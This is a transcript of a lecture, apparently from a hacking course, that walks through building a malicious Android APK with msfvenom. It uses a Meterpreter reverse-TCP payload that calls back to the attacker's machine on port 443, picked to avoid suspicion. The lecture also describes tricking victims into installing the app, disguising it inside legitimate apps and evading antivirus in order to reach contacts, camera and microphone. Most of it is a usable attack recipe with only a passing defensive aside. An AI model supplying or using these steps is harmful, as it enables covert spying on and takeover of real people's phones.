In this lecture, we're going to start with the first attack, which is creating a malicious Android app and convince the victim to install it on his Android devices. And once he installs the app on the device, we're going to have a full access on his devices. Now, this attack will be done on phases. First, I'm going to show you how the attack can be done and how can you get full access on the victim device. You can check the logs, the contacts, open the cam, open the mic. You can have full access on the device. Then I'm going to show you how to tune the attack. How can you change the icon so it become, or change the app so it will be merged with another regular app. How to convince the victim easily to install the app. So we're going to do that on phases. Now, before we start, I just want to let you know that many people do not consider to install antivirus on their mobile or on their tablet. They only install that on their computers, which is completely wrong, because as you're going to see during this section, going through many attacks, how easy it is compromised. Even if you have an antivirus installed on the victim machine, still it can be bypassed. So let's see how. So the first step, we're going to go to the Kali Linux machine. And before we start, we need to make sure that Kali Linux are on the same network. This actually is a primary attack. On the first attack, I'm going to show you how to compromise a mobile that is on the same network. Later on, we're going to see how to compromise a remote mobile. So as I explained, this will be tuned and nothing will be related to the attack. It's all network setting. So first, let's see how to do that in a simple way. Then we're going to tune it and we're going to make it very, very realistic. Before starting the attack, I need to do the following. I need to go to the setting, manage and setting of my virtual machine. And I need to make sure that on the network adapter, it's on the same network. You have to select bridge it. By default, the virtual machine has an add setting, but in this case, we're going to use bridge it. And to make sure that we are on the same network, we are going to open a terminal and check the IP of my Linux machine. ifconfig, which is 192.168.1.103. And I can check my mobile as well. If you don't know how to go to the setting of the mobile and check the IP, you can install an app. There is a nice app. It's called IP, like this one. It's a free app. Click on it. It will show you your public IP and your private IP. So in our case, our private IP is 192.168.1.104, which is on the same network. Both of them are starting with 192.168.1. and then 1.3 and 1.4. Then we need to create the fake app and add to the fake app the payload. Payload is a malicious code that will be executed on the victim machine. I wrote all the comment on the text file. I will attach this file to the lecture, so you don't have to worry about memorizing the comment. We're just going to write it down together. You can copy and paste, but let's write it down to explain it while we are writing down. So first comment is MSF Venom, and this is creating a payload. Then -p to create the payload. And then we're going to type the name of the payload, Android slash meter slash reverse underscore TCP. Now, the thing, I already explained that in the Metasploit section. Reverse TCP means that the victim will be connected to my machine, and this will bypass any router, firewall, any security setting, because the connection will be a reverse. While if you connect opposite, which is binding connection, most probably it's not very effective, and any security will drop the connection. So reverse TCP is much more effective. The Meterpreter payload is a very, very powerful payload that will give you full access on the mobile device. Then I need to put the payload setting. I need to write down this payload will connect to which machine. So I'm going to write here L host should be capital. You know that Linux is case sensitive. And then you can put the IP of your local machine, your Kali Linux machine, which is 192.168.1.103. Then, oh, I'm sorry, I'm so sorry. Numlock is off, so let me repeat it. MSF Venom minus P, then Android meter rater, then reverse underscore TCP, and then lhost and equal, we're going to put the local IP, which is 192.16, not the victim IP, our IP, because most probably I will not be aware of the victim IP, .1.103. And then the local port, which is any connection, need to be done through a specific port. I can put any port. It's better to use any port higher than 1024, but I'm going to use a port 443, which is the HTTPS port. And this because if someone is scanning the system and finds that the victim is connected through a device through a port 443, he will not suspect that this is a hacked device or that his device has been hacked, because this is a regular port that anyone can connect to. It is related to HTTPS service. Then capital R and then greater than. Greater than in Linux mean whatever output of that redirected to somewhere. And I'm going to write a name of the app. I'm going to name it app.apk. You can name whatever you want, game, app, anything you want. And click on enter. Now this is a basic payload. It will be working in most of the devices, but you can even make it more enhanced. You can encode it or encrypt it so the antivirus will not detect it if the victim has an antivirus on his mobile. So there is a lot of things that can be done to make this application very hard to detect. We're going to take later on in this section how to merge this application with one regular or normal application. The application has been created, and he's saying that it can be encrypted, it can be, and this is the size. And where it will be saved, it will be saved on your home folder. If you go here to the file manager and go to your home, you should find the app.apk. So this is the first phase. Second, let's copy it to our mobile device.